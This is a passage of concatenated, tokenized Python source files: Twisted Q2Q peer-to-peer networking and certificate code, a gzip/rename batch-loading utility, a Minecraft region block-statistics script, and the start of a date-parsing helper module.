ClientFactory ( ) <EOL> theMessageFactory . protocol = MessageSender <EOL> _ConnectionWaiter = namedtuple ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> class Q2QClientFactory ( protocol . ClientFactory ) : <EOL> protocol = Q2Q <EOL> def __init__ ( self , service ) : <EOL> self . service = service <EOL> def buildProtocol ( self , addr ) : <EOL> p = protocol . ClientFactory . buildProtocol ( self , addr ) <EOL> p . isServer = False <EOL> p . service = self . service <EOL> p . factory = self <EOL> p . wrapper = self . service . wrapper <EOL> return p <EOL> class YourAddress ( Command ) : <EOL> arguments = [ <EOL> ( '<STR_LIT:address>' , HostPort ( ) ) , <EOL> ] <EOL> class AddressDiscoveryProtocol ( Q2QBootstrap ) : <EOL> def __init__ ( self , addrDiscDef ) : <EOL> Q2QBootstrap . __init__ ( self ) <EOL> self . addrDiscDef = addrDiscDef <EOL> def connectionMade ( self ) : <EOL> self . whoami ( ) . chainDeferred ( self . addrDiscDef ) <EOL> class _AddressDiscoveryFactory ( protocol . ClientFactory ) : <EOL> def __init__ ( self , addressDiscoveredDeferred ) : <EOL> self . addressDiscoveredDeferred = addressDiscoveredDeferred <EOL> def clientConnectionFailed ( self , connector , reason ) : <EOL> self . addressDiscoveredDeferred . errback ( reason ) <EOL> def clientConnectionLost ( self , connector , reason ) : <EOL> """<STR_LIT:U+0020>""" <EOL> def buildProtocol ( self , addr ) : <EOL> adp = AddressDiscoveryProtocol ( self . addressDiscoveredDeferred ) <EOL> return adp <EOL> def _noResults ( * x ) : <EOL> return [ ] <EOL> class PTCPConnectionDispatcher ( object ) : <EOL> def __init__ ( self , factory ) : <EOL> self . factory = factory <EOL> self . _ports = { } <EOL> def seedNAT ( self , ( host , port ) , sourcePort = <NUM_LIT:0> , conditional = True ) : <EOL> if sourcePort not in self . _ports : <EOL> if sourcePort != <NUM_LIT:0> : <EOL> if conditional : <EOL> return None <EOL> else : <EOL> raise AssertionError ( '<STR_LIT>' % <EOL> ( sourcePort , self , self . _ports , self . factory . service ) ) <EOL> sourcePort = self . bindNewPort ( sourcePort ) <EOL> else : <EOL> assert sourcePort != <NUM_LIT:0> <EOL> p , proto = self . _ports [ sourcePort ] <EOL> p . write ( '<STR_LIT>' , ( host , port ) ) <EOL> return sourcePort <EOL> def bindNewPort ( self , portNum = <NUM_LIT:0> , iface = '<STR_LIT>' ) : <EOL> iPortNum = portNum <EOL> proto = ptcp . PTCP ( self . factory ) <EOL> p = reactor . listenUDP ( portNum , proto , interface = iface ) <EOL> portNum = p . getHost ( ) . port <EOL> log . msg ( "<STR_LIT>" % ( iPortNum , portNum ) ) <EOL> self . _ports [ portNum ] = ( p , proto ) <EOL> return portNum <EOL> def unbindPort ( self , portNum ) : <EOL> log . msg ( "<STR_LIT>" % portNum ) <EOL> port , proto = self . _ports . pop ( portNum ) <EOL> proto . cleanupAndClose ( ) <EOL> def connectPTCP ( self , host , port , factory , sourcePort ) : <EOL> p , proto = self . _ports [ sourcePort ] <EOL> return proto . connect ( factory , host , port ) <EOL> def iterconnections ( self ) : <EOL> for ( p , proto ) in self . _ports . itervalues ( ) : <EOL> for c in p . protocol . _connections . itervalues ( ) : <EOL> if c . protocol is not None : <EOL> yield c . protocol <EOL> else : <EOL> pass <EOL> def killAllConnections ( self ) : <EOL> dl = [ ] <EOL> for p , proto in self . _ports . itervalues ( ) : <EOL> for c in p . protocol . _connections . itervalues ( ) : <EOL> c . _stopRetransmitting ( ) <EOL> dl . append ( defer . maybeDeferred ( p . stopListening ) ) <EOL> self . _ports = { } <EOL> return defer . DeferredList ( dl ) <EOL> class Q2QService ( service . MultiService , protocol . ServerFactory ) : <EOL> publicIP = None <EOL> _publicIPIsReallyPrivate = False <EOL> debugName = '<STR_LIT>' <EOL> protocol = Q2Q <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . debugName , id ( self ) ) <EOL> def buildProtocol ( self , addr ) : <EOL> p = protocol . ServerFactory . buildProtocol ( self , addr ) <EOL> p . isServer = True <EOL> p . service = self <EOL> p . factory = self <EOL> p . wrapper = self . wrapper <EOL> return p <EOL> def iterconnections ( self ) : <EOL> """<STR_LIT>""" <EOL> return itertools . chain ( <EOL> self . appConnectionCache . cachedConnections . itervalues ( ) , <EOL> self . secureConnectionCache . cachedConnections . itervalues ( ) , <EOL> iter ( self . subConnections ) , <EOL> ( self . dispatcher or ( ) ) and self . dispatcher . iterconnections ( ) ) <EOL> def __init__ ( self , <EOL> protocolFactoryFactory = None , <EOL> certificateStorage = None , wrapper = None , <EOL> q2qPortnum = port , <EOL> inboundTCPPortnum = None , <EOL> publicIP = None , <EOL> udpEnabled = None , <EOL> portal = None , <EOL> verifyHook = None ) : <EOL> """<STR_LIT>""" <EOL> if udpEnabled is not None : <EOL> self . udpEnabled = udpEnabled <EOL> if protocolFactoryFactory is None : <EOL> protocolFactoryFactory = _noResults <EOL> self . protocolFactoryFactory = protocolFactoryFactory <EOL> if certificateStorage is None : <EOL> certificateStorage = DefaultCertificateStore ( ) <EOL> if portal is None : <EOL> portal = Portal ( certificateStorage , checkers = [ certificateStorage ] ) <EOL> self . certificateStorage = certificateStorage <EOL> self . wrapper = wrapper <EOL> self . listeningClients = { } <EOL> self . inboundConnections = { } <EOL> self . q2qPortnum = q2qPortnum <EOL> self . inboundTCPPortnum = inboundTCPPortnum <EOL> self . subConnections = [ ] <EOL> self . localFactoriesMapping = { } <EOL> self . portal = portal <EOL> if publicIP is not None : <EOL> self . publicIP = publicIP <EOL> if verifyHook is not None : <EOL> self . verifyHook = verifyHook <EOL> self . appConnectionCache = ConnectionCache ( ) <EOL> self . secureConnectionCache = ConnectionCache ( ) <EOL> service . MultiService . __init__ ( self ) <EOL> inboundListener = None <EOL> _publicUDPPort = None <EOL> def verifyHook ( self , From , to , protocol ) : <EOL> return defer . succeed ( <NUM_LIT:1> ) <EOL> def _retrievePublicUDPPortNumber ( self , registrationServerAddress ) : <EOL> d = defer . Deferred ( ) <EOL> addressDiscoveryFactory = _AddressDiscoveryFactory ( d ) <EOL> host , port = registrationServerAddress <EOL> self . dispatcher . connectPTCP ( host , port , addressDiscoveryFactory , <EOL> self . sharedUDPPortnum ) <EOL> return d <EOL> def listenQ2Q ( self , fromAddress , protocolsToFactories , serverDescription ) : <EOL> """<STR_LIT>""" <EOL> myDomain = fromAddress . domainAddress ( ) <EOL> D = self . getSecureConnection ( fromAddress , myDomain ) <EOL> def _secured ( proto ) : <EOL> lfm = self . localFactoriesMapping <EOL> def startup ( listenResult ) : <EOL> for protocol , factory in protocolsToFactories . iteritems ( ) : <EOL> key = ( fromAddress , protocol ) <EOL> if key not in lfm : <EOL> lfm [ key ] = [ ] <EOL> lfm [ key ] . append ( ( factory , serverDescription ) ) <EOL> factory . doStart ( ) <EOL> def shutdown ( ) : <EOL> for protocol , factory in protocolsToFactories . iteritems ( ) : <EOL> lfm [ fromAddress , protocol ] . remove ( <EOL> ( factory , serverDescription ) ) <EOL> factory . doStop ( ) <EOL> proto . notifyOnConnectionLost ( shutdown ) <EOL> return listenResult <EOL> if self . dispatcher is not None : <EOL> gp = proto . transport . getPeer ( ) <EOL> udpAddress = ( gp . host , gp . port ) <EOL> pubUDPDeferred = self . _retrievePublicUDPPortNumber ( udpAddress ) <EOL> else : <EOL> pubUDPDeferred = defer . succeed ( None ) <EOL> def _gotPubUDPPort ( publicAddress ) : <EOL> self . _publicUDPAddress = publicAddress <EOL> return proto . listen ( fromAddress , protocolsToFactories . keys ( ) , <EOL> serverDescription ) . addCallback ( startup ) <EOL> pubUDPDeferred . addCallback ( _gotPubUDPPort ) <EOL> return pubUDPDeferred <EOL> D . addCallback ( _secured ) <EOL> return D <EOL> def requestCertificateForAddress ( self , fromAddress , sharedSecret ) : <EOL> """<STR_LIT>""" <EOL> kp = KeyPair . generate ( ) <EOL> subject = DistinguishedName ( commonName = str ( fromAddress ) ) <EOL> reqobj = kp . requestObject ( subject ) <EOL> fakereq = kp . requestObject ( subject ) <EOL> ssigned = kp . signRequestObject ( subject , fakereq , <NUM_LIT:1> ) <EOL> certpair = PrivateCertificate . fromCertificateAndKeyPair <EOL> fakecert = certpair ( ssigned , kp ) <EOL> apc = self . certificateStorage . addPrivateCertificate <EOL> def _2 ( secured ) : <EOL> D = secured . callRemote ( <EOL> Sign , <EOL> certificate_request = reqobj , <EOL> password = sharedSecret ) <EOL> def _1 ( dcert ) : <EOL> cert = dcert [ '<STR_LIT>' ] <EOL> privcert = certpair ( cert , kp ) <EOL> apc ( str ( fromAddress ) , privcert ) <EOL> return D . addCallback ( _1 ) <EOL> return self . getSecureConnection ( <EOL> fromAddress , fromAddress . domainAddress ( ) , authorize = False , <EOL> usePrivateCertificate = fakecert , <EOL> ) . addCallback ( _2 ) <EOL> def authorize ( self , fromAddress , password ) : <EOL> """<STR_LIT>""" <EOL> return self . requestCertificateForAddress ( fromAddress , password ) <EOL> _lastConnID = <NUM_LIT:1> <EOL> def _nextConnectionID ( self , From , to ) : <EOL> lcid = self . _lastConnID <EOL> self . _lastConnID += <NUM_LIT:1> <EOL> fmt = '<STR_LIT>' % ( <EOL> From , to , lcid ) <EOL> return fmt <EOL> def mapListener ( self , to , From , protocolName , protocolFactory , isClient = False ) : <EOL> """<STR_LIT>""" <EOL> listenerID = self . _nextConnectionID ( From , to ) <EOL> call = reactor . callLater ( <NUM_LIT> , <EOL> self . unmapListener , <EOL> listenerID ) <EOL> expires = datetime . datetime ( * time . localtime ( call . getTime ( ) ) [ : <NUM_LIT:7> ] ) <EOL> self . inboundConnections [ listenerID ] = ( <EOL> _ConnectionWaiter ( From , to , protocolName , protocolFactory , isClient ) , <EOL> call ) <EOL> return expires , listenerID <EOL> def unmapListener ( self , listenID ) : <EOL> del self . inboundConnections [ listenID ] <EOL> def lookupListener ( self , listenID ) : <EOL> """<STR_LIT>""" <EOL> if listenID in self . inboundConnections : <EOL> cwait , call = self . inboundConnections . pop ( listenID ) <EOL> call . cancel ( ) <EOL> return cwait <EOL> def getLocalFactories ( self , From , to , protocolName ) : <EOL> """<STR_LIT>""" <EOL> result = [ ] <EOL> x = self . localFactoriesMapping . get ( ( to , protocolName ) , ( ) ) <EOL> result . extend ( x ) <EOL> y = self . protocolFactoryFactory ( From , to , protocolName ) <EOL> result . extend ( y ) <EOL> return result <EOL> q2qPort = None <EOL> inboundTCPPort = None <EOL> inboundUDPPort = None <EOL> dispatcher = None <EOL> sharedUDPPortnum = None <EOL> udpEnabled = True <EOL> virtualEnabled = True <EOL> def startService ( self ) : <EOL> self . _bootstrapFactory = Q2QBootstrapFactory ( self ) <EOL> if self . udpEnabled : <EOL> self . dispatcher = PTCPConnectionDispatcher ( self . _bootstrapFactory ) <EOL> if self . q2qPortnum is not None : <EOL> self . q2qPort = reactor . listenTCP ( self . q2qPortnum , self ) <EOL> self . q2qPortnum = self . q2qPort . getHost ( ) . port <EOL> if self . dispatcher is not None : <EOL> self . sharedUDPPortnum = self . dispatcher . bindNewPort ( self . q2qPortnum , iface = self . publicIP or '<STR_LIT>' ) <EOL> if self . inboundTCPPortnum is not None : <EOL> self . inboundTCPPort = reactor . listenTCP ( <EOL> self . inboundTCPPortnum , <EOL> self . _bootstrapFactory ) <EOL> if self . sharedUDPPortnum is None and self . dispatcher is not None : <EOL> self . sharedUDPPortnum = self . dispatcher . bindNewPort ( ) <EOL> return service . MultiService . startService ( self ) <EOL> def stopService ( self ) : <EOL> dl = [ ] <EOL> for cwait , delayed in self . inboundConnections . itervalues ( ) : <EOL> delayed . cancel ( ) <EOL> self . inboundConnections . clear ( ) <EOL> if self . q2qPort is not None : <EOL> dl . append ( defer . maybeDeferred ( self . q2qPort . stopListening ) ) <EOL> if self . inboundTCPPort is not None : <EOL> dl . append ( defer . maybeDeferred ( self . inboundTCPPort . stopListening ) ) <EOL> if self . dispatcher is not None : <EOL> dl . append ( self . dispatcher . killAllConnections ( ) ) <EOL> dl . append ( self . appConnectionCache . shutdown ( ) ) <EOL> dl . append ( self . secureConnectionCache . shutdown ( ) ) <EOL> dl . append ( defer . maybeDeferred ( service . MultiService . stopService , self ) ) <EOL> for conn in self . subConnections : <EOL> dl . append ( defer . maybeDeferred ( conn . transport . loseConnection ) ) <EOL> return defer . DeferredList ( dl ) <EOL> def connectQ2Q ( self , fromAddress , toAddress , protocolName , protocolFactory , <EOL> usePrivateCertificate = None , fakeFromDomain = None , <EOL> chooser = None ) : <EOL> """<STR_LIT>""" <EOL> if chooser is None : <EOL> chooser = lambda x : x and [ x [ <NUM_LIT:0> ] ] <EOL> def onSecureConnection ( protocol ) : <EOL> if fakeFromDomain : <EOL> connectFromAddress = Q2QAddress ( fakeFromDomain , toAddress . resource ) <EOL> else : <EOL> connectFromAddress = fromAddress <EOL> return protocol . connect ( connectFromAddress , toAddress , <EOL> protocolName , protocolFactory , <EOL> chooser ) <EOL> def onSecureConnectionFailure ( reason ) : <EOL> protocolFactory . clientConnectionFailed ( None , reason ) <EOL> return reason <EOL> return self . getSecureConnection ( <EOL> fromAddress , toAddress , <EOL> port , usePrivateCertificate ) . addCallback ( <EOL> onSecureConnection ) . addErrback ( onSecureConnectionFailure ) <EOL> def getSecureConnection ( self , fromAddress , toAddress , port = port , <EOL> usePrivateCertificate = None , <EOL> authorize = True ) : <EOL> """<STR_LIT>""" <EOL> toDomain = toAddress . domainAddress ( ) <EOL> resolveme = reactor . resolve ( str ( toDomain ) ) <EOL> def cb ( toIPAddress , authorize = authorize ) : <EOL> GPS = self . certificateStorage . getPrivateCertificate <EOL> if usePrivateCertificate : <EOL> ourCert = usePrivateCertificate <EOL> cacheFrom = fromAddress <EOL> log . msg ( '<STR_LIT>' , fromAddress , ourCert , cacheFrom ) <EOL> elif fromAddress . domain == '<STR_LIT>' : <EOL> assert fromAddress . resource == '<STR_LIT>' , "<STR_LIT>" % ( fromAddress , ) <EOL> authorize = False <EOL> ourCert = KeyPair . generate ( ) . selfSignedCert ( <NUM_LIT> , CN = '<STR_LIT:@>' ) <EOL> cacheFrom = fromAddress <EOL> log . msg ( "<STR_LIT>" ) <EOL> else : <EOL> try : <EOL> x = fromAddress . domainAddress ( ) <EOL> ourCert = GPS ( str ( x ) ) <EOL> cacheFrom = x <EOL> log . msg ( '<STR_LIT>' , fromAddress , ourCert , cacheFrom ) <EOL> except KeyError : <EOL> try : <EOL> x = fromAddress <EOL> ourCert = GPS ( str ( x ) ) <EOL> cacheFrom = x <EOL> log . msg ( '<STR_LIT>' , fromAddress , ourCert , cacheFrom ) <EOL> except KeyError : <EOL> try : <EOL> x = toDomain <EOL> ourCert = GPS ( str ( x ) ) <EOL> cacheFrom = x <EOL> log . msg ( '<STR_LIT>' , fromAddress , ourCert , cacheFrom ) <EOL> except KeyError : <EOL> raise VerifyError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( fromAddress , <EOL> toAddress ) ) <EOL> def connected ( proto ) : <EOL> certD = self . certificateStorage . getSelfSignedCertificate ( <EOL> str ( toDomain ) ) <EOL> def nocert ( failure ) : <EOL> failure . trap ( KeyError ) <EOL> identD = proto . callRemote ( Identify , subject = toDomain ) . addCallback ( <EOL> lambda x : x [ '<STR_LIT>' ] ) <EOL> def storeit ( certificate ) : <EOL> return self . certificateStorage . storeSelfSignedCertificate ( <EOL> str ( toDomain ) , certificate <EOL> ) . addCallback ( lambda x : certificate ) <EOL> return identD . addCallback ( storeit ) <EOL> certD . addErrback ( nocert ) <EOL> def gotcert ( foreignCA ) : <EOL> secdef = proto . secure ( cacheFrom , toDomain , <EOL> ourCert , foreignCA , <EOL> authorize = authorize ) <EOL> return secdef <EOL> certD . addCallback ( gotcert ) <EOL> return certD <EOL> return self . secureConnectionCache . connectCached ( <EOL> endpoint . TCPEndpoint ( toIPAddress , port ) , <EOL> Q2QClientFactory ( self ) , <EOL> extraWork = connected , <EOL> extraHash = ( cacheFrom , toDomain , authorize ) <EOL> ) <EOL> return resolveme . addCallback ( cb ) </s>
<s> import os <EOL> from os import walk <EOL> import sys <EOL> import thread <EOL> import gzip <EOL> from multiprocessing import Pool , Process , Queue <EOL> PROCESS_COUNT = <NUM_LIT:8> <EOL> class Utils : <EOL> @ staticmethod <EOL> def rename ( file , to ) : <EOL> call_rename = "<STR_LIT>" % ( file , to ) <EOL> print call_rename <EOL> os . system ( call_rename ) <EOL> return to <EOL> @ staticmethod <EOL> def archive ( file ) : <EOL> if "<STR_LIT>" in file : <EOL> return file <EOL> file_archive = "<STR_LIT>" % file <EOL> Utils . rename ( file , file_archive ) <EOL> return file_archive <EOL> @ staticmethod <EOL> def unarchive ( file ) : <EOL> if "<STR_LIT>" not in file : <EOL> return file <EOL> file2 = file [ : - <NUM_LIT:8> ] <EOL> Utils . rename ( file , file2 ) <EOL> return file2 <EOL> @ staticmethod <EOL> def gzip ( file ) : <EOL> if "<STR_LIT>" in file : <EOL> return file <EOL> call_zip = "<STR_LIT>" % ( file ) <EOL> print call_zip <EOL> os . system ( call_zip ) <EOL> return "<STR_LIT>" % file <EOL> @ staticmethod <EOL> def gunzip ( file ) : <EOL> if "<STR_LIT>" not in file : <EOL> return file <EOL> call_unzip = "<STR_LIT>" % ( file ) <EOL> print call_unzip <EOL> os . system ( call_unzip ) <EOL> return file [ : - <NUM_LIT:3> ] <EOL> @ staticmethod <EOL> def cat_all ( path , file ) : <EOL> call_cat = "<STR_LIT>" % ( path , file ) <EOL> print call_cat <EOL> os . system ( call_cat ) <EOL> @ staticmethod <EOL> def get_files ( path ) : <EOL> files = [ ] <EOL> for ( dirpath , dirnames , filenames ) in walk ( path ) : <EOL> for f in filenames : <EOL> file = "<STR_LIT>" % ( dirpath , f ) <EOL> files . append ( file ) <EOL> return files <EOL> def reset_file ( file , table , output = None ) : <EOL> if "<STR_LIT>" in file : <EOL> file = Utils . unarchive ( file ) <EOL> if file . endswith ( "<STR_LIT>" ) : <EOL> file = Utils . gzip ( file ) <EOL> if output : <EOL> output . put ( file ) <EOL> return file <EOL> def process_files ( path , table ) : <EOL> files = Utils . get_files ( path ) <EOL> for f in files : <EOL> if "<STR_LIT>" in f : <EOL> file = Utils . gunzip ( f ) <EOL> files = Utils . get_files ( path ) <EOL> file_result = "<STR_LIT>" <EOL> Utils . cat_all ( path , file_result ) <EOL> file_gz = Utils . gzip ( file_result ) <EOL> call_batch = "<STR_LIT>" % ( table , file_result ) <EOL> print call_batch <EOL> os . system ( call_batch ) <EOL> return file_result <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> if len ( sys . argv ) != <NUM_LIT:4> : <EOL> print "<STR_LIT>" <EOL> ( script , action , path , table ) = sys . argv <EOL> files = [ ] <EOL> processes = [ ] <EOL> function = None <EOL> if action == '<STR_LIT>' : <EOL> if os . path . isfile ( path ) : <EOL> files . append ( path ) <EOL> else : <EOL> files = Utils . get_files ( path ) <EOL> pool = Pool ( processes = PROCESS_COUNT ) <EOL> results = [ pool . apply_async ( reset_file , args = ( f , table ) ) for f in files ] <EOL> output = [ p . get ( ) for p in results ] <EOL> print output <EOL> elif action == '<STR_LIT>' : <EOL> process_files ( path , table ) </s>
<s> """<STR_LIT>""" <EOL> import locale , os , sys <EOL> import glob <EOL> try : <EOL> import nbt <EOL> except ImportError : <EOL> extrasearchpath = os . path . realpath ( os . path . join ( __file__ , os . pardir , os . pardir ) ) <EOL> if not os . path . exists ( os . path . join ( extrasearchpath , '<STR_LIT>' ) ) : <EOL> raise <EOL> sys . path . append ( extrasearchpath ) <EOL> from nbt . region import RegionFile <EOL> from nbt . chunk import McRegionChunk <EOL> def stats_per_chunk ( chunk , block_data_totals ) : <EOL> """<STR_LIT>""" <EOL> for block_id , data_id in chunk . blocks . get_all_blocks_and_data ( ) : <EOL> block_data_totals [ block_id ] [ data_id ] += <NUM_LIT:1> <EOL> def bounded_stats_per_chunk ( chunk , block_data_totals , start , stop ) : <EOL> """<STR_LIT>""" <EOL> chunk_z , chunk_x = chunk . get_coords ( ) <EOL> for z in range ( <NUM_LIT:16> ) : <EOL> world_z = z + chunk_z * <NUM_LIT:16> <EOL> if ( ( start != None and world_z < int ( start [ <NUM_LIT:2> ] ) ) or ( stop != None and world_z > int ( stop [ <NUM_LIT:2> ] ) ) ) : <EOL> break <EOL> for x in range ( <NUM_LIT:16> ) : <EOL> world_x = x + chunk_x * <NUM_LIT:16> <EOL> if ( ( start != None and world_x < int ( start [ <NUM_LIT:0> ] ) ) or ( stop != None and world_x > int ( stop [ <NUM_LIT:0> ] ) ) ) : <EOL> break <EOL> for y in range ( <NUM_LIT> ) : <EOL> if ( ( start != None and y < int ( start [ <NUM_LIT:1> ] ) ) or ( stop != None and y > int ( stop [ <NUM_LIT:1> ] ) ) ) : <EOL> break <EOL> block_id , block_data = chunk . blocks . get_block_and_data ( x , y , z ) <EOL> block_data_totals [ block_id ] [ block_data ] += <NUM_LIT:1> <EOL> def process_region_file ( filename , start , stop ) : <EOL> """<STR_LIT>""" <EOL> pieces = filename . split ( '<STR_LIT:.>' ) <EOL> rx = int ( pieces [ - <NUM_LIT:3> ] ) <EOL> rz = int ( pieces [ - <NUM_LIT:2> ] ) <EOL> block_data_totals = [ [ <NUM_LIT:0> ] * <NUM_LIT:16> for i in range ( <NUM_LIT> ) ] <EOL> if ( start != None ) : <EOL> if ( ( rx + <NUM_LIT:1> ) * <NUM_LIT> - <NUM_LIT:1> < int ( start [ <NUM_LIT:0> ] ) or ( rz + <NUM_LIT:1> ) * <NUM_LIT> - <NUM_LIT:1> < int ( start [ <NUM_LIT:2> ] ) ) : <EOL> return block_data_totals <EOL> elif ( stop != None ) : <EOL> if ( rx * <NUM_LIT> - <NUM_LIT:1> > int ( stop [ <NUM_LIT:0> ] ) or rz * <NUM_LIT> - <NUM_LIT:1> > int ( stop [ <NUM_LIT:2> ] ) ) : <EOL> return block_data_totals <EOL> file = RegionFile ( filename ) <EOL> chunks = file . get_chunks ( ) <EOL> print ( "<STR_LIT>" % ( os . path . basename ( filename ) , len ( chunks ) ) ) <EOL> for c in chunks : <EOL> if ( start != None ) : <EOL> if ( ( c [ '<STR_LIT:x>' ] + <NUM_LIT:1> ) * <NUM_LIT:16> + rx * <NUM_LIT> - <NUM_LIT:1> < int ( start [ <NUM_LIT:0> ] ) or ( c [ '<STR_LIT:z>' ] + <NUM_LIT:1> ) * <NUM_LIT:16> + rz * <NUM_LIT> - <NUM_LIT:1> < int ( start [ <NUM_LIT:2> ] ) ) : <EOL> continue <EOL> elif ( stop != None ) : <EOL> if ( c [ '<STR_LIT:x>' ] * <NUM_LIT:16> + rx * <NUM_LIT> - <NUM_LIT:1> > int ( stop [ <NUM_LIT:0> ] ) or c [ '<STR_LIT:z>' ] * <NUM_LIT:16> + rz * <NUM_LIT> - <NUM_LIT:1> > int ( stop [ <NUM_LIT:2> ] ) ) : <EOL> continue <EOL> chunk = McRegionChunk ( file . get_chunk ( c [ '<STR_LIT:x>' ] , c [ '<STR_LIT:z>' ] ) ) <EOL> assert chunk . get_coords ( ) == ( c [ '<STR_LIT:x>' ] + rx * <NUM_LIT:32> , c [ '<STR_LIT:z>' ] + rz * <NUM_LIT:32> ) <EOL> if ( start == None and stop == None ) : <EOL> stats_per_chunk ( chunk , block_data_totals ) <EOL> else : <EOL> bounded_stats_per_chunk ( chunk , block_data_totals , start , stop ) <EOL> return block_data_totals <EOL> def print_results ( block_data_totals ) : <EOL> locale . setlocale ( locale . LC_ALL , '<STR_LIT>' ) <EOL> for block_id , data in enumerate ( block_data_totals ) : <EOL> if sum ( data ) > <NUM_LIT:0> : <EOL> datastr = "<STR_LIT:U+002CU+0020>" . join ( [ locale . format_string ( "<STR_LIT>" , ( i , c ) , grouping = True ) for ( i , c ) in enumerate ( data ) if c > <NUM_LIT:0> ] ) <EOL> print ( locale . format_string ( "<STR_LIT>" , ( block_id , sum ( data ) , datastr ) , grouping = True ) ) <EOL> block_totals = [ sum ( data_totals ) for data_totals in block_data_totals ] <EOL> total_blocks = sum ( block_totals ) <EOL> solid_blocks = total_blocks - block_totals [ <NUM_LIT:0> ] <EOL> solid_ratio = ( solid_blocks + <NUM_LIT:0.0> ) / total_blocks if ( total_blocks > <NUM_LIT:0> ) else <NUM_LIT:0> <EOL> print ( locale . format_string ( "<STR_LIT>" , ( total_blocks , solid_blocks , <NUM_LIT> * solid_ratio ) , grouping = True ) + "<STR_LIT>" ) <EOL> print ( locale . format_string ( "<STR_LIT>" , block_totals [ <NUM_LIT> ] , grouping = True ) ) <EOL> print ( locale . format_string ( "<STR_LIT>" , block_totals [ <NUM_LIT> ] , grouping = True ) ) <EOL> print ( locale . format_string ( "<STR_LIT>" , block_totals [ <NUM_LIT> ] , grouping = True ) ) <EOL> print ( locale . format_string ( "<STR_LIT>" , block_totals [ <NUM_LIT:15> ] , grouping = True ) ) <EOL> print ( locale . format_string ( "<STR_LIT>" , block_totals [ <NUM_LIT:16> ] , grouping = True ) ) <EOL> print ( locale . format_string ( "<STR_LIT>" , block_totals [ <NUM_LIT> ] , grouping = True ) ) <EOL> print ( locale . format_string ( "<STR_LIT>" , block_totals [ <NUM_LIT> ] , grouping = True ) ) <EOL> print ( locale . format_string ( "<STR_LIT>" , block_totals [ <NUM_LIT> ] , grouping = True ) ) <EOL> print ( locale . format_string ( "<STR_LIT>" , block_totals [ <NUM_LIT> ] , grouping = True ) ) <EOL> print ( locale . format_string ( "<STR_LIT>" , block_totals [ <NUM_LIT> ] , grouping = True ) ) <EOL> print ( locale . format_string ( "<STR_LIT>" , block_totals [ <NUM_LIT> ] , grouping = True ) ) <EOL> print ( locale . format_string ( "<STR_LIT>" , block_totals [ <NUM_LIT> ] , grouping = True ) ) <EOL> print ( locale . format_string ( "<STR_LIT>" , block_totals [ <NUM_LIT> ] , grouping = True ) ) <EOL> print ( locale . format_string ( "<STR_LIT>" , block_totals [ <NUM_LIT> ] , grouping = True ) ) <EOL> print ( locale . format_string ( "<STR_LIT>" , block_totals [ <NUM_LIT> ] , grouping = True ) ) <EOL> print ( locale . format_string ( "<STR_LIT>" , block_totals [ <NUM_LIT:11> ] , grouping = True ) ) <EOL> def main ( world_folder , start = None , stop = None ) : <EOL> if ( not os . path . exists ( world_folder ) ) : <EOL> print ( "<STR_LIT>" + world_folder ) <EOL> return <NUM_LIT:2> <EOL> regions = glob . glob ( os . path . join ( world_folder , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> block_data_totals = [ [ <NUM_LIT:0> ] * <NUM_LIT:16> for i in range ( <NUM_LIT> ) ] <EOL> try : <EOL> for filename in regions : <EOL> region_totals = process_region_file ( filename , start , stop ) <EOL> for i , data in enumerate ( region_totals ) : <EOL> for j , total in enumerate ( data ) : <EOL> block_data_totals [ i ] [ j ] += total <EOL> except KeyboardInterrupt : <EOL> print_results ( block_data_totals ) <EOL> return <NUM_LIT> <EOL> print_results ( block_data_totals ) <EOL> return <NUM_LIT:0> <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> if ( len ( sys . argv ) == <NUM_LIT:1> ) : <EOL> print ( "<STR_LIT>" % sys . argv [ <NUM_LIT:0> ] ) <EOL> sys . exit ( <NUM_LIT:64> ) <EOL> world_folder = sys . argv [ <NUM_LIT:1> ] <EOL> world_folder = os . path . normpath ( world_folder ) <EOL> if ( not os . path . exists ( world_folder ) ) : <EOL> print ( "<STR_LIT>" + world_folder ) <EOL> sys . exit ( <NUM_LIT> ) <EOL> start , stop = None , None <EOL> if ( len ( sys . argv ) == <NUM_LIT:4> ) : <EOL> start_str = sys . argv [ <NUM_LIT:2> ] [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> start = tuple ( start_str . split ( '<STR_LIT:U+002C>' ) ) <EOL> stop_str = sys . argv [ <NUM_LIT:3> ] [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> stop = tuple ( stop_str . split ( '<STR_LIT:U+002C>' ) ) <EOL> sys . exit ( main ( world_folder , start , stop ) ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> import datetime <EOL> import re <EOL> import pytz <EOL> from pytz import UTC <EOL> from . util import if_none <EOL> def ensure_date ( date ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( date , datetime . datetime ) : <EOL> if date . tzinfo is None : <EOL> raise TypeError ( <EOL> "<STR_LIT>" ) <EOL> else : <EOL> return date . date ( ) <EOL> if isinstance ( date , datetime . date ) : <EOL> return date <EOL> if isinstance ( date , int ) and <NUM_LIT> <= date <= <NUM_LIT> : <EOL> return datetime . date ( date // <NUM_LIT> , ( date % <NUM_LIT> ) // <NUM_LIT:100> , date % <NUM_LIT:100> ) <EOL> if date == "<STR_LIT>" : <EOL> return datetime . date . today ( ) <EOL> if date == "<STR_LIT>" : <EOL> return datetime . datetime . utcnow ( ) . date ( ) <EOL> def from_ymd ( y , m , d ) : <EOL> try : <EOL> return datetime . date ( y , m , d ) <EOL> except ValueError : <EOL> raise TypeError ( "<STR_LIT>" . format ( date ) ) <EOL> if isinstance ( date , str ) : <EOL> match = re . match ( r"<STR_LIT>" , date ) <EOL> if match is None : <EOL> match = re . match ( r"<STR_LIT>" , date ) <EOL> if match is not None : <EOL> return from_ymd ( * [ int ( g ) for g in match . groups ( ) ] ) <EOL> raise TypeError ( "<STR_LIT>" . format ( date ) ) <EOL> def ensure_time ( time ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( time , datetime . datetime ) : <EOL> return date . time ( ) <EOL> if isinstance ( time , datetime . time ) : <EOL> return time <EOL> if time == "<STR_LIT>" : <EOL> return datetime . datetime . now ( ) . time ( ) <EOL> if time == "<STR_LIT>" : <EOL> return datetime . datetime . utcnow ( ) . time ( ) <EOL> def from_parts ( h , m , s = 